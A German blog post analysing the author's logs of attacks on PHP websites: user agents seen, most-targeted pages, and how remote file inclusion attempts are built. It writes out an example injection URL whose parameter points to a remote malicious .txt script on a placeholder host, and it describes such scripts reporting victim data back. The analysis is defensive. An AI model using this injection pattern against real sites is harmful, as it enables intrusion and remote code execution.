Das zweite Diagramm zeigt die übergebenen UA’s (User Agents) auf Platz eins findet man hier Internet Explorer 6.0, ob dies einfach nur ein gefakter UA oder in Wirklichkeit infizierte IE6 sind kann ich nicht sagen. Sicher ist das der IE6 einer der anfälligsten Browser in den letzten Jahren war und leider noch viele Leute damit unterwegs sind. Dann taucht quasi verstreut über das Diagramm in vielen Versionen immer wieder die libwww-perl auf. Bin hierbei sogar am überlegen ob ich nicht libwww generell als UA auf meiner Client Seite blocken sollte, zumindest mal was POST requests angeht.

 

 

 

An dritter Stelle kommt eine Grafik über die angegriffenen Ziele, hier  überrascht mich überhaupt nicht das die /index.php am häufigsten versucht wird, existiert sie doch nahezu auf jedem PHP Webspace. Was ich aber etwas seltsam finde ist die 2. Position mit einer games.php, dies ist eine Seite in einem Projekt der ich nun mal genauer ein Auge widmen werde. Warum sollte hier dauerhaft versucht werden mit Injects zu bombardieren ? Erst an dritter Stelle landet dann die Domain selbst “/”

 

 

 

Zu guter Letzt noch eine Grafik über die in Query String enthaltenen Inject Daten. Meist werden diese als .txt Datei eingeschleust da die auf allen Webservern ohne Parsing übergeben werden kann. Von daher nicht verwunderlich. Ein Injection String setzt sich meist so zusammen: 

http://
www.meineseite.de/angriffsziel.ext?angriffsvar=http://www.remoteseite.de/boesewicht.txt


Der im Beispiel blau gefärbte Aufruf variiert und wird meist durch eine dynamische Reihenfolge bekannter Exploits durchprobiert. Das rote ist üblicherweise nicht die eigene Domain des Angreifers sondern meistens sind hier Gehackte Seiten die Anbieter der Schadscripte. (hier Lila markiert) In diesen Scripten stecken meist andere PHP Scripte die sich versuchen durch Schwachstellen im Code der eigenen Webseite auszuführen. In der Regel “telefonieren” diese kleinen Biester nachhause und hinterlassen auf anderen infizierten, als Sammelstellen dienenden Hosts, Informationen über erfolgreich verwundbare Ziele. Meist werden hier noch Konfigurationen wie freier Festplattenplatz, CPU, IP, OS usw übermittelt.

Ich werde demnächst, sobald mal etwas Zeit ist, die Statistiken live per Flash Diagrammen zur Verfügung stellen. Wer daran interessiert ist beim Datensammeln zu helfen, möge sich diesen Artikel durchlesen. Dort ist beschrieben wie man das Log & Block Script einfach einbinden kann, Voraussetzung ist lediglich ein Apache Webserver mit mod_rewrite (Fast Standard heutzutage) und PHP.

Amazon Logo Diesen Blog unterstützen?
Bestell dir doch etwas bei Amazon. Nutze diesen speziellen Link, es kostet dich nichts extra und für jeden Kauf darüber erhalte ich eine kleine Gutschrift. Danke!
✉ Marco Götze//

Kommentare

Formate: | Größe: Mb
Anmelden mitoder Benutzernamen eingeben

keine Kommentare